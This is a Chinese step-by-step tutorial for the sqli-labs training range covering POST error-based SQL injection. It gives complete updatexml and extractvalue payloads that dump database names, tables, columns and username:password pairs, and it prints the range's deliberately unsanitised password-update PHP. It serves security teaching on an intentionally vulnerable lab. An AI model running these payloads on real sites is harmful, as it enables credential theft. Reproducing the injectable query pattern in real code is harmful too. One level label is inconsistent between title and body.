【sql靶场】第13、14、17关-post提交报错注入保姆级教程
目录
【sql靶场】第13、14、17关-post提交报错注入保姆级教程
1.知识回顾
1.报错注入深解
2.报错注入格式
3.使用的函数
4.URL
5.核心组成部分
6.数据编码规范
7.请求方法
2.第十三关
1.测试闭合
2.列数测试
3.测试回显
4.爆出数据库名
5.爆出表名
6.爆出字段
7.爆出账号密码
3.第十二关
4.第十七关
1.思路
2.分析
3.操作
【sql靶场】第13、14、17关-post提交报错注入保姆级教程
关卡讲解前回顾小知识,不看可以跳过,如果还不太会报错注入建议看sql靶场5-6关(报错注入)保姆级教程-CSDN博客
1.知识回顾
1.报错注入深解
有则利用报错显示进行注入,让报错里面携带所需的查询信息
可以通过列数不同进行判断是否有报错,但是报错注入一般是让报错函数通过构造非法XPath表达式强制触发数据库解析错误,其核心原理与字段数无关,原因是字段数不匹配错误发生在 结果集构造阶段(如 UNION
前后字段数不一致)报错注入的异常发生在 条件解析阶段(如XPath解析失败),早于结果集生成,无论主查询返回3个字段还是其他数量,条件逻辑仅影响数据过滤,不涉及字段数对比
2.报错注入格式
一般是通过updatexml与 extractvalue进行构造非法XPath表达式
?id=1' and updatexml(1,concat(0x7e,(子查询语句),0x7e),1)--+
?id=1' and extractvalue(1,concat(0x7e,(子查询语句),0x7e))--+
3.使用的函数
concat:将同一行中多个字段的值拼接为单个字符串,适用于单行多列数据的合并
group_concat:某一列的数据聚合,适用于单列多行数据的合并
两个可以组合使用----每次先将行中的两个字段进行拼接成字符串再进行列的每行数据聚合
GROUP_CONCAT(CONCAT(col1, col2))
区别:
concat适用于需要精准提取特定行数据的场景(如管理员账号)。需多次请求,效率较低
group_concat单次请求获取数据,但需手动拼接分片结果。适用于快速批量泄露(如全表用户密码)
问题:
在利用 updatexml 进行报错注入时,可能会因为查询结果因长度限制显示不全,可通过以下两种方法解决:mid()或 substr()分片截取数据,规避 updatexml() 的32字符长度限制
使用的语法:
limit 0,1:从第0行开始,获取1条数据。逐次修改起始位置(如 limit 1,1、limit 2,1)遍历所有记录
substr(string, start, length):从字符串第1位开始截取31个字符(因报错信息最大长度约32字符),
逐次修改 start 参数(如 32、63)循环获取后续内容。
mid(string, start, length):从字符串第1位开始截取31个字符(因报错信息最大长度约32字符),
逐次修改 start 参数(如 32、63)循环获取后续内容。
区别:
substr(string, start, length) 和mid(string, start, length) 均用于截取字符串的指定部分,两者语法和功能完全一致,但是一般使用 mid(),功能相同但兼容性更佳,可无缝替代 substr避免潜在语法冲突。
特性 | concat + limit | group_concat + substr/mid |
---|---|---|
数据范围 | 单行数据 | 多行聚合数据 |
输出格式 | 单条记录(如 user~pass ) | 多条记录合并(如 user1~pass1,user2~pass2 ) |
注入效率 | 需多次请求遍历数据 | 单次请求获取多行数据 |
长度限制处理 | 直接适配单行输出长度 | 需通过 substr 分段截取避免超长截断 |
4.URL
URL(Uniform Resource Locator)是互联网上唯一标识资源位置的字符串,包含协议、主机地址、路径等核心部分,用于定位和访问网络资源12。其标准格式为: 协议://主机地址[:端口号]/路径?查询参数#锚点 https://www.example.com:8080/api/users?id=123#section1
5.核心组成部分
协议(Scheme),定义资源访问的通信协议,例如:
http:超文本传输协议(明文传输) https:加密的HTTP协议(安全性更高) ftp:文件传输协议
主机地址(Host)
域名:如 www.example.com IP地址:如 202.108.22.5
端口号:可选,默认HTTP为80
,HTTPS为443
,自定义端口需显式指定(如:8080
)
路径(Path): 表示服务器上的资源路径,如 /api/users
或 /img/logo.png
12。
查询参数(Query Parameters):以 ? 开头,key=value 形式通过 &
分隔,用于向服务器传递附加参数,如 ?name=John&age=30。
锚点(Fragment)以 #
开头,用于页面内导航(如 #section1
),仅客户端使用,不发送至服务器。
6.数据编码规范
URL中非ASCII字符(如中文、空格)需进行URL编码
规则如下:将字符转换为十六进制值,前缀加 %
(如空格 → %20
,/
→ %2F
),编码方式由浏览器或编程语言决定,可通过 encodeURIComponent()
等函数统一处理。
示例*: https://example.com/search?q=%E4%B8%AD%E6%96%87
(搜索“中文”)
7.请求方法
GET请求
数据通过URL参数传递,明文暴露于地址栏,适用于非敏感数据(如搜索关键词)。
受URL长度限制(通常≤2048字符)。
POST请求
数据通过请求体传输,URL中仅包含资源路径(如 https://example.com/login
)。
适合提交敏感信息(如密码)或大量数据(如文件上传)
提交方式从get变成了post,使得数据不会通过URL参数传递,明文暴露于地址栏,所以使用post提交POST请求的数据存储在请求体(Body)中,而非URL参数,URL中仅包含资源路径,这里就不需要再地址栏进行测试,但是我们可以在页面的账号密码输入里尝试,可不可以进行注入
2.第十三关
方法一
在页面的输入框直接进行注入,建议使用的注释符#
方法二
使用BurpSuite,点击代理然后点击截断的截断请求,然后打开火狐浏览器,打开关卡页面,随便输入账号密码,点击提交
在这里的注入注释符#与--+都可以
打开重发器,复制到,发送,输入目标IP与端口,响应
个人建议使用BurpSuite,因为可以清楚看见自己的注入,如果出现错误比较好检查,也比较好修改,而在页面的输入框直接注入,第一由于输入框的大小限制,很影响注入语句的输入与观看,第二输入提交后注入语句会变成空,如果报错很难检查与修改错误
如果没有BurpSuite,可以观看Burp Suite Professional的下载安装与使用-CSDN博客
1.测试闭合
单引号闭合
1'
单引号闭合测试
1'#
单引号括号闭合测试
1')#
闭合方式是单引号加括号
2.列数测试
1') order by 3#
1') order by 2#
列数为2
3.测试回显
看有没有回显
没有回显,但是有报错,那么我们可以尝试报错注入
4.爆出数据库名
and extractvalue(1,concat(0x7e,(select database()),0x7e))--+
and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
5.爆出表名
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)--+
报错原因:查询表名,但是表名有多个(多行),这里无法全部展示出来,可以使用group_concat与mid,group_concat进行聚合,因为这里注入出来的表名没有超过32个字符,所以可以不使用mid进行截取
and updatexml(1,concat(0x7e,mid((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31),0x7e),1)--+
另外一种方法,使用limit,一行一行查询
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)--+
6.爆出字段
and updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_schema= 'security' and table_name='users'),1,30),0x7e),1)--+
7.爆出账号密码
and updatexml(1,concat(0x7e,(select substr((group_concat(username,0x3a,password)),1,32) from users),0x7e),1) --+
and updatexml(1,concat(0x7e,(select mid((group_concat(username,0x3a,password)),1,32) from users),0x7e),1) --+
and updatexml(1,(select concat(username,0x7e,password) from users limit 0,1),1) --+
3.第十二关
闭合测试
单引号闭合
双引号闭合
双引号闭合测试
闭合方式是1" ,剩下的与第十三关没有什么不同了
4.第十七关
1.思路
首先我们查看17关界面,发现这一关有点不一样,这里是输入正确的账号修改密码,先不看源代码进行尝试,能不能在账号输入框里面进行注入,尝试单引号与双引号闭合,会看到页面始终错误,再尝试or,如1' or '1'='1'#,是否可以存在页面不同,有没有盲注,发现一样不行,接下来尝试密码输入框进行尝试,发现一样,那可能是需要账号与密码同时有值,但是这个是修改密码的页面,说明必须要有正确的用户名才能进行修改密码,那么我们使用正确的用户名,能不能在账号的输入框进行注入呢,尝试可以发现注入不了,既然如此,就输入正确的账号,然后在修改密码的输入框里面进行注入,尝试单引号,发现报错了,既然报错了就有报错注入,接下来只需要输入正确的账号,然后在密码框里面进行注入就好了
2.分析
查看源代码
function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,15);
}
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
$row1 = $row['username'];
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "<br>";
if (mysql_error())
{
echo '<font color= "#FFFF00" font size = 3 >';
print_r(mysql_error());
echo "</br></br>";
echo "</font>";
}
else
{
echo '<font color= "#FFFF00" font size = 3 >';
echo "<br>";
echo "</font>";
}
echo '<img src="../images/flag1.jpg" />';
echo "</font>";
}
else
{
echo '<font size="4.5" color="#FFFF00">';
echo "</br>";
echo '<img src="../images/slap1.jpg" />';
echo "</font>";
}
}
可以看到里面几段代码对注入有了限制
第一段
里面有一个限制字符长度为15的限制
function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,15);
}
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
往后可以看到这个限制用在了账号,但是没有用在密码
$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];
第二段
里面有一个限制,必须要账号密码同时有
$row1 = $row['username'];
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
既然账号密码同时要,那快递要能够查询到账号才会执行修改密码语句,才能够注入
3.操作
既然找到注入点了,剩下的与前面两关的报错注入的操作基本一样